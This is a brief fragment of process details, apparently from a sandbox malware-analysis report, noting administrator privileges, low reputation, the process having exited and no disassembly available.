                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        No disassembly